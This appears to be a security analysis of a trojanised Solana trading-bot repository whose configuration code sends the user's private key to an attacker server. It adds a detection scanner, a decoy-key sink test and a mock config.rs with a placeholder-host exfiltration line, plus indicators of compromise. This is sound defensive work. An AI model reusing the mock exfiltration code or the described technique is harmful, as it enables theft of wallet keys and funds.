Malicious Bots Reappear in the Solana Ecosystem, Open Source Project Hides Private Key Theft Trap
Recently, a user had their cryptocurrency assets stolen after using an open-source project called pumpfun-pumpswap-sniper-copy-trading-bot. The security team conducted an in-depth analysis of it.
Static Analysis
The analysis found that the suspicious code lives in the configuration file /src/common/config.rs, concentrated in the create_coingecko_proxy() method. This method first calls import_wallet() to obtain the private key, and then decodes the obfuscated malicious URL.
The decoded real address is:
The malicious code then builds a JSON request body that embeds the private key and sends it to that URL with a POST request. Whatever the server responds, the malicious code continues running normally so that the user notices nothing.
create_coingecko_proxy() is called when the application starts, during the configuration-initialisation phase of main() in main.rs.
The project was most recently updated on GitHub on July 17, 2025; the main changes were in the configuration file config.rs under the src directory, where the original encoding of HELIUS_PROXY (the attacker's server address) was replaced with a new encoding.
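The three indicators the static analysis describes (a private key read from the environment, a string constant that decodes to a URL, and an HTTP POST in the same file) can be checked mechanically before anyone runs a cloned repository. The following Python script is an added example written for this article, not code from the security team or from the repository. It assumes the constant is base64- or hex-encoded (the article does not name the encoding), scans a constructed mock of config.rs whose encoded constant is a placeholder URL rather than the real IoC, and treats env::var("PRIVATE_KEY") as the secret read.

```python
"""Triage scan of Rust source for the pattern described above:
a secret read from the environment, an obfuscated string that decodes to a URL,
and an outbound HTTP POST in the same file. Added example; assumptions are marked."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Long literals made only of base64/hex characters are decode candidates.
STRING_LITERAL = re.compile(r'"([A-Za-z0-9+/=_\-]{24,})"')
# Reads of wallet material via std::env::var (the name list is an assumption; extend it).
SECRET_ENV_READ = re.compile(
    r'env::var\(\s*"(PRIVATE_KEY|[A-Z0-9_]*SECRET[A-Z0-9_]*|[A-Z0-9_]*MNEMONIC[A-Z0-9_]*)"\s*\)'
)
# Outbound POST in reqwest style.
HTTP_POST = re.compile(r'\.post\(')


@dataclass
class Finding:
    line: int
    kind: str      # "secret_read", "encoded_url" or "http_post"
    detail: str


def try_decode(token: str) -> Optional[str]:
    """Return the decoded text if `token` base64- or hex-decodes to an http(s) URL.
    The article does not name the encoding used by the real sample; base64 and hex
    are assumed here as the most common choices."""
    decoders = (
        lambda s: base64.b64decode(s, validate=True),
        lambda s: base64.urlsafe_b64decode(s + "=" * (-len(s) % 4)),
        binascii.unhexlify,
    )
    for decode in decoders:
        try:
            text = decode(token).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            return text
    return None


def scan_rust(source: str) -> List[Finding]:
    """Walk the source line by line and collect the three indicator kinds."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in SECRET_ENV_READ.finditer(line):
            findings.append(Finding(lineno, "secret_read", m.group(1)))
        for m in STRING_LITERAL.finditer(line):
            url = try_decode(m.group(1))
            if url is not None:
                findings.append(Finding(lineno, "encoded_url", url))
        if HTTP_POST.search(line):
            findings.append(Finding(lineno, "http_post", line.strip()))
    return findings


def is_suspicious(findings: List[Finding]) -> bool:
    """All three indicators together in one file is the combination worth a manual look."""
    return {"secret_read", "encoded_url", "http_post"} <= {f.kind for f in findings}


# Constructed mock of a config.rs with the shape the article describes. The encoded
# constant is a placeholder URL (https://exfil.example/collect), not the real IoC.
SAMPLE_CONFIG_RS = '''
pub const HELIUS_PROXY: &str = "aHR0cHM6Ly9leGZpbC5leGFtcGxlL2NvbGxlY3Q=";

pub fn create_coingecko_proxy() {
    let key = std::env::var("PRIVATE_KEY").unwrap_or_default();
    let url = decode_proxy(HELIUS_PROXY);
    let _ = client.post(url).json(&serde_json::json!({"pk": key})).send();
}
'''

if __name__ == "__main__":
    results = scan_rust(SAMPLE_CONFIG_RS)
    for f in results:
        print(f"line {f.line:3d}  {f.kind:<12} {f.detail}")
    print("suspicious:", is_suspicious(results))
```

Run it over every .rs file of a cloned repository (read each file and pass its text to scan_rust) and review any file where is_suspicious() is true. A legitimate project may base64-encode an endpoint for its own reasons, so the script is a triage filter, not a verdict; what matters is a decoded URL sitting in the same function that reads the wallet key.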
Dynamic Analysis
To observe the theft directly, the researchers wrote a Python script that generates a test Solana public/private key pair and starts an HTTP server to receive POST requests.
They replaced the attacker's encoded malicious server address with the encoded address of the test server, and replaced PRIVATE_KEY (the private key) in the .env file with the test private key.
After the malicious code was launched, the test server received the JSON data sent by the malicious project, which contained the PRIVATE_KEY (private key).
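The dynamic check above can be reproduced with only the Python standard library: a decoy key that controls no funds goes into .env, and a local sink records any POST body in which it appears. The script below is an added example, not the researchers' own script. The decoy is 64 random bytes in base58 keypair-export layout (an assumed format, not a derived ed25519 key), the sink listens on a random loopback port, and post_json() stands in for the suspect process during the self-test; in a real run the suspect build is pointed at the sink instead.

```python
"""Local sink for confirming credential exfiltration in an isolated test environment.
Added example; the decoy format and the sink port are assumptions."""
import json
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List
from urllib import request

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(raw: bytes) -> str:
    """Bitcoin-style base58, the alphabet Solana tooling uses for keypair strings."""
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = BASE58_ALPHABET[rem] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def make_decoy_key() -> str:
    """64 random bytes formatted like a base58 keypair export (assumed layout).
    It is not a derived ed25519 key and controls no funds; its only job is to be
    recognisable if it ever leaves the machine."""
    return b58encode(secrets.token_bytes(64))


class SinkHandler(BaseHTTPRequestHandler):
    captured: List[Dict] = []   # every POST body the sink has seen

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        try:
            payload = json.loads(body)
        except json.JSONDecodeError:
            payload = {"raw": body.decode("utf-8", "replace")}
        SinkHandler.captured.append({"path": self.path, "payload": payload})
        # Answer 200 so the suspect process behaves as it would against the real server.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):   # keep the console quiet
        pass


def start_sink() -> HTTPServer:
    """Bind the sink to an ephemeral loopback port and serve it on a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), SinkHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def leaked_decoy(decoy: str) -> bool:
    """True if any captured request body contains the decoy anywhere inside it."""
    return any(decoy in json.dumps(entry["payload"]) for entry in SinkHandler.captured)


def post_json(url: str, obj: Dict) -> int:
    """Stand-in for the suspect process in the self-test: POST a JSON body, return the status."""
    req = request.Request(url, data=json.dumps(obj).encode(), method="POST",
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req, timeout=5) as resp:
        return resp.getcode()


if __name__ == "__main__":
    server = start_sink()
    port = server.server_address[1]
    decoy = make_decoy_key()
    print(f"sink listening on http://127.0.0.1:{port}/  decoy PRIVATE_KEY={decoy[:8]}...")
    post_json(f"http://127.0.0.1:{port}/collect", {"private_key": decoy})
    print("decoy observed in a captured request:", leaked_decoy(decoy))
    server.shutdown()
    server.server_close()
```

In a real test, write the decoy into .env as PRIVATE_KEY, re-encode http://127.0.0.1:<port> into the proxy constant exactly as the article describes, run the suspect build in a throwaway VM with no other secrets, and then check leaked_decoy(); a single hit is conclusive, and the captured path and JSON shape are useful for writing a network detection afterwards.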
Indicators of Compromise (IoCs)
IP: 103.35.189.28
Domain: storebackend-qpq3.onrender.com
Malicious Repository:
Other repositories with similar implementation methods are also listed.
Summary
The attacker poses as a legitimate open-source project to lure users into downloading and running the malicious code. The project reads sensitive information from the local .env file and sends the stolen private key to a server controlled by the attacker.
Developers are advised to remain highly vigilant towards unfamiliar GitHub projects, especially those that handle wallets or private keys. If such a project must be run or debugged, do so in an isolated environment that holds no sensitive data, so that malicious programs and commands from unknown sources cannot do harm.